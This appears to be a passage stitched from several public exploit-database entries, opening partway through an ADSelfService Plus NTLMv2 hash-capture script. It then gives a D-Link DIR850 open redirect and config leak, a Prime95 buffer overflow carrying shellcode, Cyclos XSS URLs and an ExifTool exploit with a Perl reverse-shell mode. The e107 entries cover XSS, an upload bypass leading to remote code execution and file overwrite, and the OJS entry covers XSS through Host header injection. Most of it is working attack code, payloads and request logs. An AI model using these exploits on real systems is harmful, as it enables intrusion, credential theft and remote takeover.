'MINS_OF_HOUR': '5',
'EMAIL_ID': user +'@'+ domain,
'NOTIFY_ADMIN': 'true',
'NOTIFY_MANAGER': 'false',
'STORAGE_PATH': '\\\\' + listener + '\\share',
'FILE_FORMAT': 'HTML',
'ATTACHMENT_TYPE': 'FILE',
'ADMIN_MAIL_PRIORITY': 'Medium',
'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',
'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',
'MANAGER_FILE_FORMAT': 'HTML',
'MANAGER_ATTACHMENT_TYPE': 'FILE',
'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',
'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',
'adscsrf': csrf
}
sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)
if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:
print('[-] The target is patched!')
sys.exit(1)
if sch.status_code == 200:
print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")
else:
print("[-] Something went wrong. Please, try it manually!")
sys.exit(1)
except:
print('[-] Connection error!')
def main():
arg = get_args()
domain = arg.domain
auth = arg.auth
user = arg.user
password = arg.password
target = arg.target
listener = arg.listener
scheduler(domain, auth, target, listener, user, password)
if __name__ == "__main__":
main()
# Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/
#Exploit :
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1
# Exploit Title: DLINK DIR850 - Insecure Access Control
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE : CVE-2021-46378
# Exploit Author: Ahmed Alroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/
# Exploit :
Visit http://<IP Address>/config.dat
# Exploit Title: Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86
# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE
# 1- How to use: open the program go to test-PrimeNet-check the square-Connections
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open
buffer = "A" * 144
jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)
nop = "\x90" * 20 #Nob
hot = "C" * 100
#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload
payload = b""
payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"
payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"
payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"
payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"
payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"
payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"
payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"
payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"
payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"
payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"
payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"
payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"
payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"
payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"
payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"
payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"
payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"
payload += b"\xc7\x33\x80\xb2"
evil = buffer + jum + nop + payload
file = open('PExploit.txt','w+')
file.write(evil)
file.close()
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673
# Description:
A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.
# Steps to reproduce:
An attacker sends a draft URL
[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
When a victim opens the URL, XSS will be triggered.
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674
# Description:
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.
# Steps to reproduce:
An attacker sends a draft URL
[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.
When a victim opens the URL, XSS will be triggered.
# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution
# Date: 04/30/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://exiftool.org/
# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
# Version: 7.44-12.23
# Tested on: ExifTool 12.23 (Debian)
# CVE: CVE-2021-22204
# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204
# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image
#!/usr/bin/env python3
# Imports
import base64
import os
import subprocess
import sys
# Class for colors
class color:
red = '\033[91m'
gold = '\033[93m'
blue = '\033[36m'
green = '\033[92m'
no = '\033[0m'
# Print UNICORD ASCII Art
def UNICORD_ASCII():
print(rf"""
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")
# Print exploit help menu
def help():
print(r"""UNICORD Exploit for CVE-2021-22204
Usage:
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
Options:
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
""")
# Run the exploit
def exploit(command):
UNICORD_ASCII()
# Create perl payload
payload = "(metadata \"\c${"
payload += command
payload += "};\")"
print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")
print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")
# Write payload to file
payloadFile = open('payload','w')
payloadFile.write(payload)
payloadFile.close()
# Bzz compress file
subprocess.run(['bzz', 'payload', 'payload.bzz'])
# Run djvumake
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
if '-i' in sys.argv:
imagePath = sys.argv[sys.argv.index('-i') + 1]
subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])
else:
# Smallest possible JPEG
image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
# Write smallest possible JPEG image to file
with open("image.jpg", "wb") as img:
img.write(base64.decodebytes(image))
# Write exiftool config to file
config = (r"""
%Image::ExifTool::UserDefined = (
'Image::ExifTool::Exif::Main' => {
0xc51b => {
Name => 'HasselbladExif',
Writable => 'string',
WriteGroup => 'IFD0',
},
},
);
1; #end
""")
configFile = open('exiftool.config','w')
configFile.write(config)
configFile.close()
# Exiftool config for output image
subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])
# Delete leftover files
os.remove("payload")
os.remove("payload.bzz")
os.remove("exploit.djvu")
os.remove("exiftool.config")
# Print results
print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")
exit()
if __name__ == "__main__":
args = ['-h','-c','-s','-i']
if args[0] in sys.argv:
help()
elif args[1] in sys.argv and not args[2] in sys.argv:
exec = sys.argv[sys.argv.index(args[1]) + 1]
command = f"system(\'{exec}\')"
exploit(command)
elif args[2] in sys.argv and not args[1] in sys.argv:
localIP = sys.argv[sys.argv.index(args[2]) + 1]
localPort = sys.argv[sys.argv.index(args[2]) + 2]
command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"
exploit(command)
else:
help()
# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected - Via adding comment (Authenticated)
# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' >
[...]
User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field
image.png
### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.
Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)
image->media manager->upload a file->Image/File URL
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]
image.png
### Upload restriction bypass (Authenticated [Admin])+RCE
Upload and execute .PHP file
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.
image.png
Media Manager-> Media Upload/Import -> From a remote location
# POC
Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
We can see uploaded PHP file on the server side.
image.png
cmd.php file source:
<?php
system('whoami');
?>
image.png
### Upload restriction bypass (Authenticated [Admin])+ Server file override
Attacker can override example top.php file in the main directory of web application.
Original file top.php in server:
image.png
We can override file via following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
top.php file content was tampered:
# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg
XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce:
1) Go to this site: https://who's-using-ojs-software.com
2) And capture this request in burp , and send to repeater.
3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version.
This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability